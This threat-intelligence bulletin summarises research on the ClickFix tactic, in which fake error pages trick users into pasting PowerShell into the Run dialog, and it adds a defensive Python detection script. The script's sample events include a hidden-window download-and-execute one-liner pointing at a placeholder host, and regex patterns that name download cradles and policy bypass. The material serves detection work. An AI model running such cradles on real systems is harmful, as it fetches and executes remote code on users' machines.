ClickFix Tactic: The Phantom Meet

Summary:
Researchers at Sekoia have shed light on a new social engineering tactic called ClickFix, which displays fake error messages in web browsers to trick users into copying and executing malicious PowerShell code, infecting the targeted system. Over the last couple of months, ClickFix has been used to distribute Windows and macOS infostealers, botnets, and remote access tools. Several sites impersonating Google Meet, Google Chrome, Facebook, PDFSimpli, and reCAPTCHA have been set up by actors using this tactic. All of these sites require the victim to click a button, either to verify that they are human or to fix an error with the webpage. After clicking the button, the victim is prompted to open the Run command and press “Ctrl + V.” Because the button silently copies PowerShell code to the victim’s clipboard when clicked, pressing “Ctrl + V” pastes that code into the Run command prompt, where the victim unknowingly executes it.

Security Officer Comments:
Proofpoint researchers initially uncovered this ClickFix tactic being leveraged by initial access brokers like TA571 in email phishing campaigns since March 2024. These campaigns employ HTML files disguised as Word documents, displaying a fake error window that prompts users to install malware such as Matanbuchus, DarkGate, or NetSupport RAT via a PowerShell script. More recently, this tactic has been used to propagate malware via compromised websites and distribution infrastructures. Because the tactic deceives users into downloading and running malware without a direct web browser download or manual file execution, it allows actors to bypass web browser security features like Google Safe Browsing.

Suggested Corrections:
Users should take caution when coming across websites that ask them to execute commands through the Run command prompt. No legitimate website is going to ask a user to execute PowerShell code to verify whether they are human or to fix an issue. As such, users should avoid copying and pasting unknown commands from untrusted sources, especially into the system command prompt. Keeping systems up to date and installing antivirus solutions can also help detect and prevent the various malware strains delivered through these malicious commands.
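On the defender side, the mechanism described in the Summary leaves a recognizable trace: code pasted into the Run prompt is launched with explorer.exe as the parent process, and the pasted PowerShell typically relies on a hidden window, an encoded command, or a download-and-execute cradle. The following Python script, added here as an illustration and not part of the Sekoia report, runs that logic over a handful of constructed process-creation events. The event layout, the field names, the sample command lines, and the example.invalid host are all assumptions made for the demonstration.

```python
import re
from dataclasses import dataclass, field

# Constructed sample process-creation events in a simplified Sysmon-like shape.
# None of these come from the report; the URLs and paths are placeholders.
SAMPLE_EVENTS = [
    {  # PowerShell launched from the Run dialog with a hidden window and a download cradle
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -w hidden -c \"iex (iwr 'https://example.invalid/x').Content\"",
    },
    {  # Benign: a user opening Paint from the Run dialog
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\mspaint.exe",
        "cmdline": "mspaint.exe",
    },
    {  # PowerShell started by a scheduled updater, not by the user via explorer.exe
        "parent": r"C:\Program Files\Software\updater.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -File C:\\ProgramData\\Software\\maint.ps1",
    },
    {  # PowerShell launched from the Run dialog with an encoded command (placeholder payload)
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -NoP -EncodedCommand aQBlAHgA",
    },
    {  # Edge case: an admin simply opening an interactive console from the Run dialog
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe",
    },
]

# Interpreters a pasted Run-dialog command would typically start.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Command-line traits that are common in pasted ClickFix-style one-liners
# but rare in an interactive console a user opens on purpose.
SUSPICIOUS_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I),
    "download_cradle": re.compile(
        r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring|curl)\b", re.I
    ),
    "bypass_policy": re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I),
}


@dataclass
class Finding:
    index: int                       # position of the event in the input list
    cmdline: str                     # the offending command line, for the analyst
    indicators: list = field(default_factory=list)


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def is_run_dialog_shell(event: dict) -> bool:
    """True when a shell interpreter was started directly by explorer.exe,
    which is what a command pasted into the Run dialog looks like."""
    return _basename(event["parent"]) == "explorer.exe" and _basename(event["image"]) in SHELL_IMAGES


def analyze(events, min_indicators: int = 1):
    """Return a Finding for each explorer.exe-spawned shell whose command line
    carries at least `min_indicators` suspicious traits."""
    findings = []
    for i, ev in enumerate(events):
        if not is_run_dialog_shell(ev):
            continue
        hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(ev["cmdline"])]
        if len(hits) >= min_indicators:
            findings.append(Finding(i, ev["cmdline"], hits))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"event {f.index}: {', '.join(f.indicators)} :: {f.cmdline}")
```

The parent-process check does the heavy lifting: PowerShell started by a software updater or a logon script never reaches the pattern match, while an interactive console opened from the Run dialog passes the parent check but carries no indicators and is therefore not flagged. In a real deployment the same idea maps onto Sysmon Event ID 1 or an EDR process-creation feed, and the Run dialog's own history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU gives incident responders a second place to look for a pasted command after the fact.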

IOCs can be found here.

Link(s):
https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/